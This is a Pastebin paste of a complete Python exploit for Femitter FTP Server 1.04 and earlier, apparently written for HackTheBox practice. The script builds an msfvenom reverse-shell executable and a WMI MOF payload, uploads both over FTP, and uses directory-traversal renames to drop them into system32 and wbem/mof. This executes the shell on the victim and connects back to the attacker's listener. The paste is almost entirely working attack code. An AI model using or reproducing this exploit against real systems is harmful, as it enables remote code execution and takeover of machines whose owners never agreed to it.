SHARE
TWEET

Acritum Femitter Server ftpd exploit

a guest Jul 23rd, 2019 219 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. #This script is designed to take advantage of a directory transversal vulnerability in Femitter FTP Server <= 1.04;
  4. #Tested on XP Professional x86;
  5. #You will need to set up a listener to catch the reverse shell;
  6. #You might also need to manually hardcode the ftp.cwd() command below if Femitter is not in a default configuration;
  7. #Inspired by Ippsec's DropZone walkthrough & HackTheBox.eu
  8.  
  9. #1. creates an MSF payload;
  10. #2. creates a MOF payload;
  11. #3. uploads both payloads to writable dir;
  12. #4. renames them to place them in system32 and system32/wbem/mof/ respectively;
  13.  
  14. import os
  15. import sys
  16. from ftplib import FTP
  17.  
  18. if len(sys.argv) != 3:
  19.     print("Usage: femitter.py lhost lport\nExample: femitter.py 10.10.10.10 443")
  20.     exit()
  21. else:
  22.     lhost = sys.argv[1]
  23.     lport = sys.argv[2]
  24.  
  25. command = "msfvenom -p windows/shell_reverse_tcp lhost=" + lhost + " lport=" + lport + " -f exe --platform windows -a x86 -o zzzzz.exe >/dev/null 2>&1"
  26.  
  27.  
  28. print('[+] creating msfvenom payload...' + '\r')
  29. os.system(command)
  30.  
  31. #creating our hardcoded MOF payload, thanks to ippsec
  32. print('[+] creating MOF payload...' + '\r')
  33. mof_file = open("exploit.MOF", "w")
  34. mof_file.write("""#pragma namespace("\\\\\\\\.\\\\root\\\\cimv2")
  35. class MyClass54266
  36. {
  37.     [key] string Name;
  38. };
  39. class ActiveScriptEventConsumer : __EventConsumer
  40. {
  41.     [key] string Name;
  42.     [not_null] string ScriptingEngine;
  43.     string ScriptFileName;
  44.     [template] string ScriptText;
  45.   uint32 KillTimeout;
  46. };
  47. instance of __Win32Provider as $P
  48. {
  49.     Name  = "ActiveScriptEventConsumer";
  50.     CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
  51.     PerUserInitialization = TRUE;
  52. };
  53.  
  54. instance of __EventConsumerProviderRegistration
  55. {
  56.   Provider = $P;
  57.   ConsumerClassNames = {"ActiveScriptEventConsumer"};
  58. };
  59.  
  60. Instance of ActiveScriptEventConsumer as $cons
  61. {
  62.   Name = "ASEC";
  63.   ScriptingEngine = "JScript";
  64.   ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"zzzzz.exe\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass54266\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};";
  65.  
  66. };
  67.  
  68. instance of __EventFilter as $Filt
  69. {
  70.   Name = "instfilt";
  71.   Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass54266\\"";
  72.   QueryLanguage = "WQL";
  73. };
  74.  
  75. instance of __FilterToConsumerBinding as $bind
  76. {
  77.   Consumer = $cons;
  78.   Filter = $Filt;
  79. };
  80.  
  81. instance of MyClass54266 as $MyClass
  82. {
  83.   Name = "ClassConsumer";
  84. };
  85.  
  86. """)
  87. mof_file.close()
  88.  
  89. victimIP = str(raw_input("[!] enter the victim IP: "))
  90. username = str(raw_input("[!] enter Femitter FTP username: "))
  91. password = str(raw_input("[!] enter Femitter FTP password: "))
  92.  
  93. #login to ftp server, change directories, upload our msfvenom payload, upload our .MOF payload, catch reverse-shell
  94. print('[+] authenticating to Femitter server...')
  95. try:
  96.     ftp = FTP(victimIP)
  97.     ftp.login(username,password)
  98. except:
  99.     print('[-] unable to connect to server')
  100. try:   
  101.     print('[+] uploading payloads...')
  102.     ftp.cwd('Upload')
  103.     #^Change this if femitter is not in default config!!^
  104.     ftp.storbinary('STOR zzzzz.exe', open('zzzzz.exe', 'rb'))
  105.     ftp.storbinary('STOR exploit.MOF', open('exploit.MOF', 'rb'))
  106. except:
  107.     print('[-] unable to upload payloads, non-default configuration?')
  108. try:   
  109.     print('[+] executing payloads...')
  110.     ftp.rename('zzzzz.exe', '../../../../../../windows/system32/zzzzz.exe')
  111.     ftp.rename('exploit.MOF', '../../../../../../windows/system32/wbem/mof/exploit.MOF')
  112.     ftp.quit()
  113.     print('[+] enjoy that shell ;)')
  114. except:
  115.     print('[-] unable to execute payloads')
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top